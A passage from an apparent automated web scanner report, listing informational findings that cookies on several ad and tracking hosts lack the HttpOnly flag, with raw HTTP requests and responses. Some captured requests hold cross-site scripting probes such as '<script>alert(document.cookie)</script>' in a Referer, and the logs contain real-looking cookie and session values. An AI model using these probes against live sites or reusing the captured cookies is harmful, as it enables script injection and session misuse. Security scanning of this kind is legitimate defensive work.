Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:27:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:27:28 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:27:28 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 843

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f
...[SNIP]...

17.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:28:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:28:06 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:28:06 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 842

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252
...[SNIP]...

17.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 12:56:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 12:56:47 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 12:56:47 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 813

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183b
...[SNIP]...

17.82. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?id=1051114&t=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=2c382b2c-154d-11e0-8090-001e6849f405&_hmacv=1&_salt=2076931618&_keyid=k1&_hmac=deb36388c0462f4f1745f3224a27addc34e20c73; pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~"; lifb=%y_Qs7i<Qa5p0/:; ih="b!!!!7!(4vA!!!!#<kc#t!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF"; 
bh="b!!!#l!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#I=D!!!!#<kjhR!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!%<kc#o!#MTF!!!!%<kc#o!#MTH!!!!%<kc#o!#MTI!!!!%<kc#o!#MTJ!!!!%<kc#o!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#RY.!!!!'<kdT!!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!%<kc#o!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%!!!!'<kdT!!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo!!!!'<kdT!!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<g!!!!#<kI4S!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%
<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h!!!!'<kdT!!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b!!!!'<kdT!!#p]T!!!!$<kL2n"

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:50 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b!!!#m!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#I=D!!!!#<kjhR!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!%<kc#o!#MTF!!!!%<kc#o!#MTH!!!!%<kc#o!#MTI!!!!%<kc#o!#MTJ!!!!%<kc#o!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#RY.!!!!'<kdT!!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!%<kc#o!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%!!!!'<kdT!!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo!!!!'<kdT!!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<g!!!!#<kI4S!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj
@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h!!!!'<kdT!!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b!!!!'<kdT!!#p]T!!!!$<kL2n"; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT
Cache-Control: no-store
Last-Modified: Sun, 30 Jan 2011 01:23:50 GMT
Pragma: no-cache
Content-Length: 167
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1037875620/?label=nOCpCPKW9QEQpPPy7gM&amp;guid=ON&amp;script=0" />');

17.83. http://add.my.yahoo.com/rss

Summary

Severity:   Information
Confidence:   Certain
Host:   http://add.my.yahoo.com
Path:   /rss

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rss HTTP/1.1
Host: add.my.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:21:50 GMT
Set-Cookie: B=49rk3tt6k9f9e&b=3&s=sq; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 3312

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 404 Not Found</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,h
...[SNIP]...

17.84. http://ads.asp.net/a.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.asp.net
Path:   /a.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a.aspx?Task=Click&ZoneID=37&CampaignID=1887&AdvertiserID=2&BannerID=2555&SiteID=2&RandomNumber=1776744983&Keywords= HTTP/1.1
Host: ads.asp.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.infragistics.com/redirects/SLNetDec1610SL4-WPF-DC
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Set-Cookie: ASP.NET_SessionId=5zm5r4vkiruwbqz3nggspz55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5zm5r4vkiruwbqz3nggspz55; path=/; HttpOnly
Set-Cookie: %24SPIDER=False; path=/
Set-Cookie: %24CC=US; expires=Sun, 30-Jan-2011 23:22:00 GMT; path=/
Set-Cookie: %24RC=TX; expires=Sun, 30-Jan-2011 23:22:00 GMT; path=/
Set-Cookie: %24MC=0; expires=Sun, 30-Jan-2011 23:22:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:59 GMT
Connection: close
Content-Length: 177

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.infragistics.com/redirects/SLNetDec1610SL4-WPF-DC">here</a>.</h2>
</body></html>

17.85. http://ads.neudesicmediagroup.com/ads/charts_1110_728x90.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.neudesicmediagroup.com
Path:   /ads/charts_1110_728x90.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/charts_1110_728x90.gif HTTP/1.1
Host: ads.neudesicmediagroup.com
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 30921
Content-Type: image/gif
Last-Modified: Wed, 17 Nov 2010 22:49:50 GMT
Accept-Ranges: bytes
ETag: "92e2cdbda986cb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: ARRAffinity=4d2595d3360958e1a13d6a0752f068ec43e5a9f153c5cfa82e99d6cafccefb25;Path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:08 GMT

GIF89a..Z.........M.........&I.Vs......lqqr........N.U........}.m.....M...S..Ne......~.^....0......e......................c....QQQ....Jy....G.....".......e.$..........5n.4N....d...[.f.y.>.c.111.b.....
...[SNIP]...

17.86. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/ako?activate&csid=A06546 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; 
rsi_us_1000000=pUMdIzlHMAYY1E2E9lxOYWXfXTuzYLjp8p1460/+gWTby/AVlHUSZTOeZKFoZQt/V4GpHKodzzO99xyuL+LlNTOgYNk8l7vd9SWxAAvTUjn9wS/Zubj3pseYHAeyBVwS0rUlJRFhp0SxvIn+bW5/BIpp2vBxnS14MViPq2ivke+iDP09PJL7xbJKM3DlRa3LSrtKzc89EsvYTbzu+kGpcc6NxWHBkG8ge2CQugoNifcYvbm/lCUs3YPUzchjpm/nOoJHm/cTLVlzOq2/hXTPb0MyCGujLE+IIF9R1j0tsya4cpTKxDHVHAwYM3CYkYHc7waufhO+YEECVhuwsWC98+TEYKnbvBuZ/LFUC5M+ne413gSJ9fKGNrpOsMVsO4uPvBojOqcVHxnpGBRWnjTCP1cUtV83GYLcdAOzcPrvpMNcC9WG3rFQnzSleYPtOb7kiE3oL1h8KEDcjRCOt4LdC7+bpu9UJrc/0m2ZFKslWZ6fphmOl6qQMtHee9NA2R5+ZaqoZDJiJcH6Cj34rgnO5dCjuZjPEAN3vyk/cs5oNuOTnGtZPmRUwjY4fVfWopHNfW2Hu+t6WTXXmXTsLLsiGCT83eSgcWmlkf8aqGRfLHUzj26RTTM1dA7FHmNLza1hwTpKTQyJZDnk7HhRdai6Qcedk9